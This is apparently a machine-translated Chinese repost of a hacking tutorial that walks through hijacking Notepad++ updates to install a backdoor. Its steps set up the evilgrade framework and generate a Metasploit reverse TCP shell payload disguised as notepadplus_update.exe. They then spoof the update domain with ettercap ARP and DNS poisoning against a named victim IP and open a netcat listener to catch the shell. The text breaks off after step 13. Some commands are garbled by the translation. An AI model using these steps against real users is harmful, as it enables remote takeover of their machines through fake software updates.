如何劫持软件更新来安装 Rootkit 的后门访问

有无数种方法破解系统。如果我们想应用自己的系统,我们不应该忽视任何的可能性,我们需要搜索弱点保持警惕。在这次破解,我们将会看看滥用信任用户对软件更新,他们的系统上安装监听器/rootkit。

利用”值得信赖”的软件更新

我们都看见这条消息 ― ―现在有可用的软件更新!无一例外,我们相信此消息并下载的更新,大概是使我们更好地工作、 添加新功能,或使我们的系统更安全的系统。

如果,相反,当我们要提示下载更新,我们的系统会给出一个恶意的黑客控制安装恶意软件?这是我们要对我们的受害者在这里做什么 !

不同于其他黑客攻击,这是一个独立的,正是这样的操作系统、 端口等。在这里我们将滥用用户信任,没有一个操作系统或应用程序。

这将是我们为 Null Byte, 做过的最复杂黑客之一,所以如果你是新来的黑客,你可能想回来后做点工作背景。这次破解也利用了我们做在早些时候教程使用中间人攻击,所以您可能想要先读一下。

第 1 步: 安装 NotePad + +

在这次破解,我们将使用Notepad + +作为我们的示例软件,我们将劫持其更新,所以您将需要将它安装在一个系统上。在我的示例中,我下载了它到 Windows 7 的系统。

您可以下载最新版本的 Notepad + +.

第 2 步: 下载和安装 EvilGrade

下一步,我们会安装Infobytesec evilgrade,它被设计成一个模块化的框架,使攻击者可以通过注射”evil”更新到不知道用户的更新。我们可以下载从 GitHub evilgrade.

现在被称为evilgrade目录。

mkdir -p /root/evilgrade

现在更改目录。

cd /root/evilgrade

下一步我们解压并安装 evilgrade。

tar -xvf isr-evilgrade-2.0.0.tar.gz

第 3 步: 运行 Evilgrade

下一步我们需要运行 evilgrade。我们键入:

./ evilgrade

我们现在使用它从它自己的提示符运行于 evilgrade 交互式模式

evilgrade >

第 4 步: 列出模块

现在,运行的 evilgrade,让我们看看这些evilgrade 已建的模块。在这里,代表evilgrade模块设计劫持其更新/升级过程的软件。在这个技巧,当然,我们会劫持Notepad++升级。

正如你可以看到下面,evilgrade有许多其它的软件模块,但它远覆盖所有的软件更新/升级。

show modules

image003

关键是要找到受害者是使用什么程序,也是evilgrade的模块和目标应用程序列表。

第 5 步: 配置Notepad

接下来,我们需要告诉我们想要劫持其升级的过程是什么的软件的 evilgrade。让我们告诉 evilgrade 我们想要劫持notepadplus.

evilgrade>configure notepadplus

第 6 步: 查看 Notepad + + 模块需要什么参数

我们的下一步就是看哪些参数是evilgrade notepadplus模块需要的功能。我们用类似下面的命令检查这个Metasploit键入:

show options

image004

 

我们可以在上面的截图中看到此模块,需要我们到 Notepad + + 的软件和更新,即 sourceforge.net 源点。此外,我们需要设置代理,将是我们想要在受害人在预期更新位置上安装的恶意负载。

第 7 步: 生成一个Metsploit有效载荷

在,我们已经设置evilgrade了,我们需要开发一个恶意的有效载荷交付给升级软件,而不是实际的升级。我们可以用Metasploit的做到这一点。

如果您按照我的Metasploit的其他教程,你知道,我们可以选择一些不同的有效载荷使用Metasploit的(有效载荷是什么,我们加载到受害系统给我们控制)。在这种情况下,我们将使用其中一个最基本的有效载荷,在reverse tcp shell.。

 

我们可以产生一个有效载荷而不使用以下命令打开Metasploit的。此命令需要从Metasploit的框架,并将其装入一个利用一个叫做notepadplus_update.exe文件。

/pentest/exploits/framework/modules/payloads/windows

shell_reverse_tcp LHOST 192.168.1.104

> /root/evilgrade/notepadplus_update.exe

image005

请注意,如果您使用的是不同版本的Backtrack或kali,这些有效载荷模块在不同的目录。

第8步:启动Evilgrade

接下来,我们必须启动evilgrade 服务器。这是以一个简单的初始命令。

evilgrade>start

第 9 步:添加Notepad++更新服务器作为域

我们的下一步是添加Notepad++我们要劫持域名。我们可以通过添加一个进入ettercap的etter.dns欺骗模块。这使我们能够欺骗受害者的软件更新源域名。

由于Notepad++是由SourceForge,我们添加下面一行的etter.dns文件结束。

notepad-plus.sourceforge.net A 192.168.1.104

image006

当然,你使用的IP地址应该是你想要更新过程来寻找你的邪恶更新IP地址。

第 10 步:配置iptables

iptables是Linux或UNIX内置防火墙/路由器。我们可以使用这个功能,路由的流量通过我们的系统在一个中间人攻击。让我们在您最喜爱的文本编辑器中打开etter.conf文件。

kwrite /etc/etter.conf

image007

如图所见,通过文件当你滚动约三分之二,有一个条目,我已在 iptables 上突出显示。简单地取消注释 (删除 #) 到第二个和第三行,以便使用 iptables。

第 11 步: 开始 Ettercap

我们现在可以用下面的命令启动 ettercap。

ettercap-Tqi eth0-P dns_spoof-M arp 192.168.1.114 192.168.1.104

条件:

-T  指定终端接口

-q  使用安静模式

-i  eth0说,我们想要使用eth0作为我们的接口

-P dns_spoof选定,我们想要使用 dns欺骗 plug in_

-M  arp说,我们想要使用 arp 中间人攻击上之间两个 IP addresses_

第 12 步: 开启 Netcat 监听器

现在我们需要从我们的攻击机器启动netcat 侦听器。我们需要监听的evilgrade应用程序定义的端口,在这种情况下,Notepad + + 的端口为1234。

nc-l-p 1234

第 13 步: 打开 Notepad + +

现在,让我们在受害者计算机打开 Notepad + +  。

image008


你可能感兴趣的:(软件更新劫持)